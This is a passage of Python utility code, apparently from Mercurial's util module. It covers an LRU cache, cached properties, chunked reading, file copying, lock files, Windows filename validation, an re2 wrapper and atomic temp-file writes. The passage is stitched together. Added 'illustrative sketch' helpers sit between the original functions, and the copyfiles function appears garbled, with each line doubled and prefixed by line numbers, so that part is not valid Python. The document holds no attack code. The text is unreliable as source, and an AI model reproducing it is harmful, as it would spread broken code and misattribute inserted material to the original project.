        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            self.totalcost -= node.cost
            del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def peek(self, k, default=_notset):
        """Get the specified item without moving it to the head

        Unlike get(), this doesn't mutate the internal state. But be aware
        that this doesn't make peek() thread safe.
        """
        try:
            node = self._cache[k]
            return node.value
        except KeyError:
            if default is _notset:
                raise
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev

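# Illustrative sketch, not part of the original module: a cost-bounded LRU
# cache, e.g. capping estimated memory use instead of just entry count.
def _demolrucachedict():
    d = lrucachedict(4, maxcost=100)
    d.insert(b'a', b'x' * 60, cost=60)
    d.insert(b'b', b'y' * 60, cost=60)  # total cost 120 > 100: b'a' evicted
    return d.get(b'a') is None          # True
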
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

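# Illustrative sketch, not part of the original module: memoization bounded
# to roughly the 20 most recently used argument values.
_demonormpath = lrucachefunc(lambda p: p.replace(b'\\', b'/'))
# _demonormpath(b'a\\b') -> b'a/b'; old entries fall out as new keys arrive.
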
class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    prop = pycompat.sysstr(prop)
    if prop in obj.__dict__:
        del obj.__dict__[prop]

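# Illustrative sketch, not part of the original module: a lazily computed
# attribute that is evaluated once, then served straight from __dict__.
class _demolazy(object):
    @propertycache
    def answer(self):
        return 42  # runs once; the result shadows the descriptor

# clearcachedproperty(obj, b'answer') drops the cached value so the next
# attribute access recomputes it.
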
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

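# Illustrative sketch, not part of the original module: coalescing many tiny
# chunks into progressively larger buffers to reduce per-chunk overhead.
def _demoincreasingchunks():
    chunks = increasingchunks(iter(['x' * 100] * 100))
    # For this input the yielded sizes are roughly [1100, 2100, 4100, 2700]:
    # each buffer at least doubles until the 64k ceiling or the data runs out.
    return [len(c) for c in chunks]
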
def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

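# Illustrative sketch, not part of the original module: the relative walk
# from one repository file to another (POSIX separators assumed here).
def _demopathto():
    # from a/b (relative to the root) to c/d: climb twice, then descend
    return pathto('/repo', 'a/b', 'c/d')  # == '../../c/d' on POSIX
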
# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

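# Illustrative sketch, not part of the original module: distinguishing a
# caller's arity mistake from a TypeError raised deeper inside the function.
def _demochecksignature():
    f = checksignature(lambda a, b: a + b)
    f(1, 2)  # fine
    f(1)     # raises error.SignatureError instead of a bare TypeError
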
# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'apfs',
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

1760 def copyfiles(src, dst, hardlink=None, progress=None):
1760 def copyfiles(src, dst, hardlink=None, progress=None):
1761 """Copy a directory tree using hardlinks if possible."""
1761 """Copy a directory tree using hardlinks if possible."""
1762 num = 0
1762 num = 0
1763
1763
1764 def settopic():
1764 def settopic():
1765 if progress:
1765 if progress:
1766 progress.topic = _('linking') if hardlink else _('copying')
1766 progress.topic = _('linking') if hardlink else _('copying')
1767
1767
1768 if os.path.isdir(src):
1768 if os.path.isdir(src):
1769 if hardlink is None:
1769 if hardlink is None:
1770 hardlink = (os.stat(src).st_dev ==
1770 hardlink = (os.stat(src).st_dev ==
1771 os.stat(os.path.dirname(dst)).st_dev)
1771 os.stat(os.path.dirname(dst)).st_dev)
1772 settopic()
1772 settopic()
1773 os.mkdir(dst)
1773 os.mkdir(dst)
1774 for name, kind in listdir(src):
1774 for name, kind in listdir(src):
1775 srcname = os.path.join(src, name)
1775 srcname = os.path.join(src, name)
1776 dstname = os.path.join(dst, name)
1776 dstname = os.path.join(dst, name)
1777 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1777 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1778 num += n
1778 num += n
1779 else:
1779 else:
1780 if hardlink is None:
1780 if hardlink is None:
1781 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1781 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1782 os.stat(os.path.dirname(dst)).st_dev)
1782 os.stat(os.path.dirname(dst)).st_dev)
1783 settopic()
1783 settopic()
1784
1784
1785 if hardlink:
1785 if hardlink:
1786 try:
1786 try:
1787 oslink(src, dst)
1787 oslink(src, dst)
1788 except (IOError, OSError):
1788 except (IOError, OSError):
1789 hardlink = False
1789 hardlink = False
1790 shutil.copy(src, dst)
1790 shutil.copy(src, dst)
1791 else:
1791 else:
1792 shutil.copy(src, dst)
1792 shutil.copy(src, dst)
1793 num += 1
1793 num += 1
1794 if progress:
1794 if progress:
1795 progress.increment()
1795 progress.increment()
1796
1796
1797 return hardlink, num
1797 return hardlink, num
1798
1798
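# A minimal sketch (hypothetical helper, not part of the module's API)
# showing the device check that drives copyfiles()'s hardlink default:
# hardlinks cannot cross filesystem boundaries, so st_dev must match.
def _samedevicesketch(a, b):
    # copyfiles(src, dst) with hardlink=None performs essentially this
    # probe before attempting oslink()
    return os.stat(a).st_dev == os.stat(b).st_dev
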
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    with posixfile(pathname, 'rb') as fp:
        return fp.read()

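# A minimal round-trip sketch (hypothetical helper with a made-up payload):
# with os.symlink available, the lock content is the symlink target, so
# readlock() recovers it via readlink(); on platforms without symlinks the
# O_EXCL regular file is used and readlock() falls back to a plain read.
def _lockroundtripsketch(pathname):
    makelock(b'hostname:12345', pathname)  # hypothetical "host:pid" payload
    try:
        return readlock(pathname)          # -> b'hostname:12345' either way
    finally:
        unlink(pathname)
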
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

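# A minimal usage sketch (hypothetical paths): probe a repository's metadata
# directory, whose '.hg' basename is foldable as fscasesensitive() requires.
def _casesensitivesketch(repopath):
    # True on most Linux filesystems, False on default macOS/Windows volumes
    return fscasesensitive(os.path.join(repopath, b'.hg'))
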
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

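# A minimal sketch of the wrapper's contract (hypothetical pattern): with
# only IGNORECASE/MULTILINE set, the flags are folded into the pattern as
# (?i)/(?m) and re2 is tried first; any other flag, or an re2-incompatible
# pattern, silently falls back to the stdlib engine.
def _recompilesketch():
    m = re.compile(br'(?:^|/)\.hg(?:$|/)', remod.IGNORECASE)
    # whichever engine compiled it, the object exposes a match() method
    return bool(m.match(b'.HG/store'))
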
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

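# A minimal usage sketch (hypothetical names): both arguments must already
# be normcase()d; fspath() then restores the on-disk spelling one component
# at a time from its per-directory listdir() cache.
def _fspathsketch(root):
    # if the tree actually contains 'Foo/BAR.txt', this returns
    # b'Foo/BAR.txt' on a case-insensitive filesystem
    return fspath(normcase(b'foo/bar.txt'), normcase(root))
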
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because it is
    an alternative to the simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
    """Create a temporary file with the same contents as name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode, enforcewritable)

    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

class filestat(object):
    """help to exactly detect changes of a file

    The 'stat' attribute is the result of 'os.stat()' if the specified
    'path' exists. Otherwise, it is None. This avoids a preparatory
    'exists()' examination on the client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        the same time in seconds (= S[n-1].ctime), so comparison of
        timestamps is ambiguous.

        The basic idea to avoid such ambiguity is "advance mtime 1 sec,
        if the timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        changes because of collisions between such mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if the size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be the previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other

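# A minimal sketch of the ambiguity dance described above (hypothetical
# helper): snapshot, rewrite within the same second, then nudge mtime so a
# later size/ctime/mtime comparison cannot mistake one write for the other.
def _avoidambigsketch(path):
    old = filestat.frompath(path)
    writefile(path, b'second write, possibly within the same second')
    new = filestat.frompath(path)
    if new.isambig(old):
        # sets mtime to (old mtime + 1) & 0x7fffffff, unless EPERM
        new.avoidambig(path, old)
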
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    The checkambig argument of the constructor is used with filestat, and
    is useful only if the target file is guarded by a lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode,
                                    enforcewritable=('w' in mode))

        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

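# A minimal usage sketch (hypothetical path): writes go to the temporary
# copy and become visible only at close(); raising inside the with-block
# routes through __exit__() to discard(), leaving the original untouched.
def _atomicwritesketch(path):
    with atomictempfile(path, 'wb', checkambig=True) as fp:
        fp.write(b'all or nothing\n')
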
def unlinkpath(f, ignoremissing=False, rmdir=True):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    if rmdir:
        # try removing directories that might now be empty
        try:
            removedirs(os.path.dirname(f))
        except OSError:
            pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read l bytes of data from the iterator of chunks of data.
        Returns less than l bytes if the iterator runs dry.

        If the size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
